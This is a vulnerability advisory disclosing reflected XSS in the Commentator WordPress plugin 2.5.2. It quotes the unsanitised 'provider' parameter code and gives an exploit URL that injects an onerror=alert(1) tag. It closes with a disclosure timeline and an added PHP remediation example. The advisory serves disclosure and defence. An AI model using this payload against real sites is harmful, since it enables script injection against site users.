Commentator WordPress Plugin XSS Vulnerability

## FULL DISCLOSURE

#Product : Commentator WordPress Plugin
#Exploit Author : Rahul Pratap Singh
#Version : 2.5.2
#Home page Link : http://codecanyon.net/item/commentator-wordpress-plugin/6425752
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 13/Jan/2016

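XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
The "provider" request parameter is not sanitized before it is echoed back into the page, which leads to reflected XSS.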

----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php

line:441
$provider_name = $_REQUEST["provider"];

line:544
<div id="commentator-social-signin" class="commentator-<?php echo $provider_name; ?>">

----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">  <IMG%20SRC=axc%20onerror=alert(1)>

----------------------------------------
POC:
----------------------------------------
[Image: commentatorxsspoc]

Fix:
Update to 2.5.3
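
For anyone reviewing similar code, the pattern at lines 441 and 544 is closed by validating the parameter against an allow-list and encoding it on output. The following is an added example, not the plugin's code and not the vendor's 2.5.3 patch; the function names and the provider list (other than "facebook") are assumptions, and plain PHP htmlspecialchars() stands in for WordPress's esc_attr().

```php
<?php
// Added example: not the plugin's code and not the vendor's 2.5.3 patch.

// Hypothetical allow-list; only "facebook" appears in the advisory.
const ALLOWED_PROVIDERS = ['facebook', 'twitter', 'google'];

/**
 * Return a provider name that is safe to place in a class attribute,
 * or null when the request value is not a known provider.
 */
function commentator_safe_provider(array $request): ?string
{
    $raw = $request['provider'] ?? '';
    if (!is_string($raw)) {          // provider[]=x arrives as an array
        return null;
    }
    $name = strtolower(trim($raw));
    // Strict comparison against fixed values: nothing request-supplied survives.
    return in_array($name, ALLOWED_PROVIDERS, true) ? $name : null;
}

/** Render the sign-in container, with output encoding as a second layer. */
function render_signin_div(?string $provider): string
{
    if ($provider === null) {
        return '<div id="commentator-social-signin" class="commentator-unknown">';
    }
    // In WordPress, esc_attr() or sanitize_html_class() fills this role.
    $class = htmlspecialchars('commentator-' . $provider, ENT_QUOTES, 'UTF-8');
    return '<div id="commentator-social-signin" class="' . $class . '">';
}

// Constructed sample inputs: a normal value, the advisory's test string,
// and an array-typed parameter.
$samples = [
    ['provider' => 'facebook'],
    ['provider' => 'facebook"> <IMG SRC=axc onerror=alert(1)>'],
    ['provider' => ['x']],
];
foreach ($samples as $request) {
    echo render_signin_div(commentator_safe_provider($request)), PHP_EOL;
}
```

Only the first sample yields a provider-specific class; the other two fall through to the fixed "commentator-unknown" value, so no request data reaches the markup.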

Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016

Pub Ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752